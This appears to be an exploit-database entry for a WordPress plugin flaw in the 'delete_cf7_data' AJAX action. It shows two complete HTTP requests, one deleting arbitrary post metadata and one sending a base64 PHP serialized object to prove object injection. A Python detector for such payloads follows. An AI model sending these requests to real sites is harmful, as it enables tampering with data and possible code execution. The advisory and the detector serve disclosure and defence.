## https://sploitus.com/exploit?id=WPEX-ID:ADC5DD9B-0781-4CEA-8CC5-2C10AC35B968
To delete the _edit_lock metadata of post ID 18:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock


To prove the object injection, we inserted a new class in the plugin file:

# class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}}

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
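
For detection, the second request stands out because a form field base64-decodes to a PHP serialized object header. The following is an added example, not part of the original advisory or the plugin's code: it scans a form-encoded body for such fields, and the function names `serialized_class` and `scan_body` and the `BODY_PLAIN` sample are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# Header of a PHP serialized object: O:<len>:"<Class>":<count>:{  (C: = Serializable)
SERIALIZED_OBJECT = re.compile(rb'^[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')

# Bodies copied from the two requests above, plus one constructed plain-text case.
BODY_META_DELETE = ("action=delete_cf7_data&data%5b0%5d%5bid%5d=18"
                    "&data%5b0%5d%5bkey%5d=_edit_lock")
BODY_OBJECT = ("action=delete_cf7_data&data[0][id]=1data[0][key]=test"
               "&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=")
BODY_PLAIN = 'action=example&val=O:8:"stdClass":0:{}'  # constructed sample


def serialized_class(value):
    """Return the class name if value is, or base64-decodes to, a PHP object."""
    candidates = [value.encode("utf-8", "replace")]
    try:
        # Form decoding turns '+' into a space; restore it before decoding.
        candidates.append(base64.b64decode(value.replace(" ", "+"), validate=True))
    except (binascii.Error, ValueError):
        pass  # not base64, so only the raw value is checked
    for raw in candidates:
        match = SERIALIZED_OBJECT.match(raw)
        if match:
            return match.group(1).decode()
    return None


def scan_body(body):
    """Return (parameter, class) pairs for fields carrying a serialized object."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        cls = serialized_class(value)
        if cls:
            findings.append((name, cls))
    return findings


if __name__ == "__main__":
    for label, body in [("meta delete", BODY_META_DELETE),
                        ("object injection", BODY_OBJECT),
                        ("plain serialized", BODY_PLAIN)]:
        print(label, scan_body(body))
```

The first request carries no serialized data, so catching it depends on correlating the `delete_cf7_data` action with the role of the authenticated session rather than on payload inspection.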